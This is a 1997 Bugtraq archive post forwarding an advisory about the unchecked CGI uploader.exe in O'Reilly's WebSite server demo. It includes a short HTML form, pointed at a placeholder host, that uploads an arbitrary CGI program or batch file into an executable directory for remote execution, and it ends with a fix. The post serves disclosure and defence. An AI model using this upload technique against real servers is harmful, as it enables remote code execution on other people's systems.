Bugtraq mailing list archives

[Alert] Website's uploader.exe (from demo) vulnerable

From: aleph1 () DFW NET (Aleph One)
Date: Thu, 4 Sep 1997 16:59:12 -0500


---------- Forwarded message ----------
Date: Thu, 4 Sep 1997 21:38:57 +0200
From: Herman de Vette <herman () INFO NL>
To: NTBUGTRAQ () NTADVICE COM
Subject: [Alert] Website's uploader.exe (from demo) vulnerable

[Alert] Website's uploader.exe (from demo) vulnerable

Check out what I found today (hope it's not an known bug yet)

O'reilly's webserver 'website' contains a demopackage that contains
the cgi-program uploader.exe. The following html-page was included with
it:
----------------------------------------

<HTML><HEAD><TITLE>Upload a File</TITLE></HEAD>

<BODY>

<H1>Upload a file</H1>

<hr>

<h2>NOTE: Your browser must support file uploading.</H2>

<FORM ENCTYPE="multipart/form-data" METHOD=POST
ACTION="/cgi-win/uploader.exe/Uploads/">

<PRE>Your name:        <INPUT TYPE=TEXT SIZE=20 NAME="name"> (required)

Email address:    <INPUT TYPE=TEXT SIZE=20 NAME="email"> (required)

                  <b>NOTE:</b> If you don't see a "browse" button below,
your browser

                  doesn 't support form-based file uploading. Netscape
2.0 and

                  later have this support.

File to upload:   <INPUT TYPE=FILE NAME="upl-file" SIZE=40>

File description: <INPUT TYPE=TEXT SIZE=40 NAME="desc"> (required)

                  <INPUT TYPE=SUBMIT VALUE="Upload Now">

</FORM>

<HR>

<A HREF="mailto:...";>

<address>...</address>

</A></BODY></HTML>

-----------------------------------------

The program uploader.exe doesn't check anything at all. If you're lucky
you're running windows NT
and have put only "read/execute access" on cgi-win and other executable
paths. Otherwise (win95) you
have a real problem. You could create a CGI-program, next you change the
HTML-file a little like this:

-----------------------------------------

<HTML><HEAD><TITLE>Upload Any File Anywhere</TITLE></HEAD>

<BODY>

<FORM ENCTYPE="multipart/form-data" METHOD=POST
ACTION="http://host.of.vulnerable.website/cgi-win/uploader.exe/cgi-win/";>

  <INPUT TYPE=HIDDEN NAME="name" VALUE="Foo">

  <INPUT TYPE=HIDDEN NAME="email" VALUE="Foo () bar com>

  File to upload: <INPUT TYPE=FILE NAME="upl-file" SIZE=40>

  <INPUT TYPE=TEXT SIZE=40 NAME="desc" VALUE="YouGottaSecurityProblem">

  <INPUT TYPE=SUBMIT VALUE="Upload Now">

</FORM>

</BODY></HTML>
------------------------------------------

open the html-file in your browser, select a nice CGI-file to upload
And run that CGI-program remotely. (No need to tell you what this
CGI-program could do,
could be .bat file too in one of website's other cgi-directories)

SOLUTION: remove uploader.exe, delete it, empty your trash bin and use
ftp for file-upload

Herman de Vette
herman () info nl

Current thread:

Pine's re-occuring nightmare jericho () DIMENSIONAL COM (Sep 01)
- MS responds to Exchange Server 5.0 POP3 Security problem Manley, Jim W (Sep 01)
- Re: Pine's re-occuring nightmare Mark Crispin (Sep 01)
- HP UX Bug :) Leonid S Knyshov (Sep 01)
  - Re: HP UX Bug :) Brian Mitchell (Sep 02)
  - in.comsat DoS vulnerability Andrew Hobgood (Sep 02)
  - You can find jizz.c here T o r g (Sep 03)
  - You can find jizz.c here anonymous () ANONYMOUS ORG (Sep 03)
  - [linux-security] Announce: chkexploit 1.13 (fwd) iON BARRiER (Sep 04)
    - Re: [linux-security] Announce: chkexploit 1.13 (fwd) W.C. Epperson (Sep 04)
    - [Alert] Website's uploader.exe (from demo) vulnerable Aleph One (Sep 04)
    - Overflow in one of Apache 1.1.1 (maybe later too)'s modules Matt Conover (Sep 04)
    - Re: Overflow in one of Apache 1.1.1 (maybe later too)'s modules Artur Pydo - EuroBretagne (Sep 05)
    - Re: Overflow in one of Apache 1.1.1 (maybe later too)'s modules Marc Slemko (Sep 05)
- Announcement: Phrack 51 Nate (Sep 01)
- Pine has a few more problems... dynamo () IME NET (Sep 01)
- SNI-18: Vacation Vulnerability Secure Networks Inc. (Sep 01)
- SNI-18: Vacation Vulnerability ggajic () FREENET NETHER NET (Sep 02)